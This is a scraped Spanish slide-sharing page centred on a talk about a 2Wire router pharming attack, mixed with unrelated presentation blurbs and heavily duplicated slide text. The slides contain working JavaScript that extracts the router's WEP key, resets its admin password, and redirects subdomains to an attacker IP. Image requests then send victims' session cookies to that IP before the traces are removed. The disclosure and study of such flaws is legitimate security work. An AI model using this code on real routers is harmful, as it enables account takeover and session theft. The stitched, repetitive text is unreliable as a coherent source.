Descripción de un ataque a un ruteador 2Wire que muestra como es posible desde un ataque al ruteador, obtener los datos de sesión de sitios importantes. El ataque que se realiza es pharming pero de una manera especial, ya que no se redirigen las páginas para montar un scam o página falsa, si no que se redirigen subdominios de los dominios originales y se intenta, en ese momento, realizar las peticiones con el cliente a los sitios para obtener las cookies de los dominios originales.
Código completo y video en:
http://www.websec.mx/blog/ver/Robo_de_cookies_por_router_vulnerable_caso_2Wire
En esta presentación damos a conocer dos distintas maneras de como representar diseños arquitectónicos a través de la utilización del color. Asi pues, mostramos algunos ejemplos y explicaciones de como usar los lapices de color y los colores acuarelables.
Documento presentado por el Ministro de Hacienda a la Asamblea Legislativa con el proyecto del Presupuesto General de la Nación, estimado para 2013 $4,505.3 Millones.
En esta presentación damos a conocer dos distintas maneras de como representar diseños arquitectónicos a través de la utilización del color. Asi pues, mostramos algunos ejemplos y explicaciones de como usar los lapices de color y los colores acuarelables.
Documento presentado por el Ministro de Hacienda a la Asamblea Legislativa con el proyecto del Presupuesto General de la Nación, estimado para 2013 $4,505.3 Millones.
Rouge AP, Evil Twin, Portal cautivo con proxy web son partes de una constante amenaza a redes inalámbricas:
Aprendamos los posibles ataques para saber como protegernos.
Gracias a la utilización de técnicas propias del desarrollo a medida, conseguimos optimizar un sitio web basado en wordpress para obtener el mayor rendimiento posible. Nos remangaremos para analizar el código y optimizarlo. Presentación de taller impartido en Congreso Web 2017
Esta charla pretende enseñar como añadir RabbitMQ a un proyecto Symfony.
Charla realizada en Symfony Barcelona el dia 2 de julio. Podeis encontrar ejemplos de código en https://github.com/solilokiam/rabbitmqexample
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesNextel S.A.
Presentación Pablo Garaizar de la Universidad de Deusto, durante la XV Jornada de Seguridad TI de Nextel S.A. en la Alhóndiga de Bilbao el jueves 27 de junio de 2013.
Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript...RootedCON
En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.
Ponencia de Jesús Damián Angosto, Auditor de seguridad y análisis forense, y Raúl Morales, Pentester, expertos de Ciberseguridad en Ingenia.
Se presentan casos prácticos y análisis de vulnerabilidades reales que denotan la importancia de blindar los sistemas de seguridad/tecnología en las organizaciones.
Ingenia acudió como patrocinador estratégico a estas "XIII Jornadas STIC CCN-CERT: Comunidad y confianza, bases de nuestra Ciberseguridad", organizada por CCN-CERT el pasado 11-12 de diciembre en Kinépolis (Ciudad de la Imagen), Madrid.
DrupalCamp Spain 2018: CSI, autopsia de vulnerabilidadeszekivazquez
Slides de la sesión impartida en DrupalCamp Spain 2018 por Zequi Vázquez, en la que se describe cómo funcionan tres de las vulnerabilidades más relevantes del core de Drupal en los últimos años.
Desymfony 2011 - Tutorial #1: Instalacion y primeros pasosJavier Eguiluz
Instalación y primeros pasos fue la primera ponencia impartida durante las Jornadas Symfony 2011. Se trata de la primera parte de las seis que forman el tutorial de desarrollo de la aplicación github.com/desymfony.
Durante la misma se explIca cómo instalar y configurar Symfony2, cómo instalar el proyecto deSymfony, cómo crear los bundles con el generador interactivo y también se introduce el funcionamiento de la arquitectura MVC en Symfony2 mediante la programación de la parte dedicada a mostrar las páginas estáticas de la aplicación.
Aplicar la seguridad en WordPress desde la selección de un hosting José Conti Calveras
Presentación realizada en la WordCamp Sevilla 2016
En ella aprendemos desde la selección de un hosting hasta el mantenimiento día a día o como actuar con nuestro contenido.
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonWebsec México, S.C.
Investigación sobre el estado de fabricantes y de mecanismos de seguridad utilizados en redes inalámbricas 802.11 en México por Paulino Calderon. (2013)
Plática sobre utilizar diferentes técnicas para detener a scanners de seguridad y a la gente que los usa sin pensarlo.
Impartida en CISI 2018, DragonJARCON 2018, 8.8 Bolivia, 8.8 Perú y 8.8 México.
Grabación en video:
https://www.youtube.com/watch?v=NtQpzjgitao&t=1s
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
Información sobre vulnerabilidades recientes y cómo explotarlas. EternalBlue en Windows 7, EternalRomance en Windows 2016, LNK CVE-2017-8464 y SMBLoris en Windows 10. Presentación para alumnos de la UANL Universidad Autónoma de Nuevo León impartida durante el Congreso Internacional de Seguridad de la Información CISI en agosto del 2017.
Escribiendo firmas para el sistema de detección de versiones de NmapWebsec México, S.C.
En esta presentación aprendemos como funciona el sistema de detección de versiones de Nmap y como podemos escribir nuestras propias firmas para reconocer nuevos servicios en nuestra red.
El porqué está fallando tu programa de seguridad informática por Paulino Cald...Websec México, S.C.
Plática sobre las razones por las cuales fallan los programas de seguridad informática en las empresas actualmente. Experiencias personales que me han ocurrido a lo largo de mi carrera.
Esta charla trata sobre las vulnerabilidades más peligrosas que afectan a redes caseras y de trabajo actualmente. Se demostrarán técnicas reales que funcionan incluso en ambientes corporativos protegidos y que pueden ser utilizadas para comprometer redes enteras en menos de un día.
Dumpeando hashes del controlador de dominio por @_hkm
Una plática rápida sobre una de las técnicas más redituables durante una prueba de penetración. Utilizando una cuenta con permisos de administrador de dominio mostraremos como dumpear todos los hashes en formato NTLM almacenados en el controlador de dominio del directorio activo.
OSINT vs cibercrimen por @nickops
Conoce técnicas y herramientas de Inteligencia de Fuentes Abiertas (OSINT) que te ayudarán a reaccionar ante delitos de fraudes y extorsiones cibernéticas. Analizaremos un caso donde la Policía Cibernética de la Ciudad de México descubrió, investigó y capturó a una banda de extorsionadores por Internet.
Fraudes y extorsión cibernética.
Técnicas y herramientas de la Policía cibernética.
Técnicas y herramientas de OSINT.
- OSINT con Apps de Mensajería Instantánea.
- OSINT con entidades privadas y de Gobierno.
- OSINT con Facebook Graph Search.
Acerca del ponente @nickops:
Ingeniero en Telemática, egresado del Instituto Politécnico Nacional (UPIITA). Laboró en el GSC Ericsson México participando en proyectos de telefonía IP, móvil y fija. Es aficionado a la Seguridad Informática y se especializa en investigaciones cibernéticas con fuentes abiertas (Open Source Intelligence). Colaboró con la Unidad de Investigación Cibernética de la Procuraduría General de Justicia del Distrito Federal (PGJDF) en la búsqueda de una banda de extorsionadores por Internet. Es miembro de la Comunidad G3eckArmy y cuenta con publicaciones en blogs sobre Tecnología, Seguridad Informática y Protección de Datos Personales.
Recuperación de defaces y modificación de bases de datos con versionador git por @Alevsk
El objetivo es añadir una capa de seguridad extra a nuestros sitios o blog personales (y a proyectos mas grandes ¿Por que no?) para evitar y recuperarnos de los hackeos, con ayuda de algunos scripts en bash corriendo en background y Git podemos detectar cambios en los archivos de nuestro servidor y regresar al estado "trusted" que tiene el repositorio de Git, de igual manera revisando los checksums de las tablas en nuestra base de datos podemos saber si se ha insertado, eliminado o modificado algún registro o tabla (en el caso de sql injection y xss en la base de datos) y restaurarla rápidamente usando una copia. :)
Seguridad de Bitcoin por Luis Daniel Beltrán
- Descripción breve de como funciona el protocolo y la cadena de bloques.
- Mitos sobre el protocolo.
- Puntos fuertes del protocolo.
- Puntos débiles del protocolo.
- Descripción de como se han dado los robos mas representativos de Bitcoins.
- Explicación del reto que tenemos como profesionales en seguridad con este nuevo paradigma en el manejo de activos digitales.
Acerca del ponente Luis Daniel Beltrán
Desde muy temprana edad y de manera autodidacta se introdujo en el mundo de la tecnología llevándolo con los años a ser uno de los primeros usuarios de Internet en México. En la actualidad se especializa en montar y administrar infraestructura de seguridad para aplicaciones y sitios web de alto tráfico. Desde el año 2012 dedica parte de su tiempo libre al estudio de las criptomonedas.
A veces la diferencia entre poder acceder a un sistema remoto con éxito o fallar puede ser el conocimiento de una herramienta, una línea de comando o incluso una técnica de evasión de AV/Firewall. Esta plática brindará consejos y trucos para poder hackear "like a Boss", que le dará una ventaja durante la auditoría de un sistema
Ponente: Roberto Salgado. Director técnico y co-fundador de Websec México. Roberto ha participado y contribuido en proyectos importantes como ModSecurity, PHPIDS, sqlmap y el libro “Web Application Obfuscation“. Creó la base de conocimientos de inyección SQL, una de las referencias más completas disponibles en la web y Panoptic, un buscador de rutas de archivos comunes con vulnerabilidades tipo LFI. También desarrollo el método más rápido para extraer información de bases de datos vulnerables a inyección a ciegas.
CPMX5 - Las nuevas generaciones de redes por Luis ColungaWebsec México, S.C.
¿Te frustras cuando la comunicación inalámbrica falla cuando más la necesitas? ¿Sabías que es posible recibir señales de aviones, barcos o satélites de una manera fácil y económica? Software Defined Radio nos da herramientas para solucionar los problemas en las redes inalámbricas actuales y realizar cosas que antes eran imposibles.
Ponente: Luis Colunga. Investigador de Seguridad Informática con Websec. Desde los 11 años ha estado involucrado en las telecomunicaciones. Una de sus pasiones es propiciar la generación de soluciones a través de las telecomunicaciones, le preocupa que estos sistemas sean "seguros"
Video: https://www.youtube.com/watch?v=yuvLT0ALAoE
Mafalda está más viva que nunca. Reaparece siempre fresca y renovada en sus nuevos libros y periódicos. Hace cine y televisión. Viaja en la imaginación colectiva de infinidad de naciones que son muy diferentes entre ellas culturalmente. Y llega a los lugares más insospechados, volviéndose familiar a generaciones que no tienen nada que ver con la que vio nacer a Mafalda
2. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
4. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
5. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
6. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
7. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
8. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
9. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
10. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
11. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
12. Explota un XSS para
estar en la misma
zona y obtener la
configuración.
Explota una
revelación de
configuración para
obtener la WEP
Utiliza la función de
resetear el
password con la
WEP.
Obtiene la sesión
de administrador.
Redirige los
subdominios a la IP
de almacenamiento
de cookies.
Realiza peticiones
desde el cliente a
los subdominios
Almacena las
cookies del cliente
Limpia las
redirecciones del
ruteador.
p w n a g e
13. try { xmlhttp=new ActiveXObject("MSXML2.XMLHTTP"); } catch(e) {xmlhttp = new
XMLHttpRequest()}xmlhttp.open("GET","/xslt?page=mgmt_data",false);xmlhttp.send(
null);var info = xmlhttp.responseText;var pass = "temporal";var wep =
info.substr(info.indexOf("encrypt_key">0x")+15,10);document.getElementById('ea').
innerHTML += "<b>Configuración obtenida.</b><br>Parseando
WEP...<br><b>WEP:</b> "+wep+"<br>Cambiando el password a 'temporal'...<br>";
xmlhttp.open("POST","/xslt");xmlhttp.setRequestHeader("Content-
type","application/x-www-form-
urlencoded");xmlhttp.send("PAGE=A04_POST&THISPAGE=A04&NEXTPAGE=A04_POST
&SYSKEY="+wep+"&PASSWORD="+pass+"&PASSWORD_CONF="+pass+"&HINT="+pass
);document.getElementById('ea').innerHTML += "<b>Password 'temporal'
establecido.</b><br>Obteniendo sesión...<br>";
xmlhttp.open("GET","/xslt?PAGE=A02_POST&THISPAGE=&NEXTPAGE=J01&CMSKICK=
&PAGE=A02&NEXTPAGE=J01&SHOWHINT=1&PASSWORD="+pass, false);xmlhttp.send(
null);document.getElementById('ea').innerHTML += "<b>Sesion
obtenida.</b><br><b>Cookie: </b>"+document.cookie+"<br>Redirigiendo
subdominios...<br>";
Disponible en Routerpwn desde Junio 2011 !
14. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
16. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
17. for (var i=0; i<dominios.length; i++) {
dns=dominios[i];
xmlhttp.open("GET","/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME="+d
ns+"&ADDR="+ip,false);
xmlhttp.send(null);}document.getElementById('ea').innerHTML += "<b>Dominios
redirigidos.</b><br>Abriendo subdominios y enviando cookies...<br>";
for (var i=0; i<dominios.length; i++) {
dns=dominios[i];
document.write('<img src=http://'+dns+'>');}
document.getElementById('ea').innerHTML += "<b>Cookies enviadas.</b><br>Eliminando
redirecciones de subdominios...<br>";
for (var i=20; i<dominios.length+21; i++) {
xmlhttp.open("GET","/xslt?PAGE=J38_DEL&THISPAGE=J38&NEXTPAGE=J38_DEL&NAMEID="
+i,false);
xmlhttp.send(null);}document.getElementById('ea').innerHTML += "<b>Redirecciones
eliminadas.</b><br><br><b>FIN.</b> Que tengas un buen dia :)";
width=500 height=500>2wiro</iframe></body><html>
18. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.
19. La victima visita una página web maliciosa que tiene el código
para explotar una vulnerabilidad de router pharming en su
ruteador.
Se redirigen los subdominios de dominios verdaderos a la IP
del atacante.
Se realizan peticiones a los subdominios desde el browser de
la victima.
Las cookies de la victima correspondientes a los dominios
originales son transmitidas a la IP del atacante.
p w n a g e.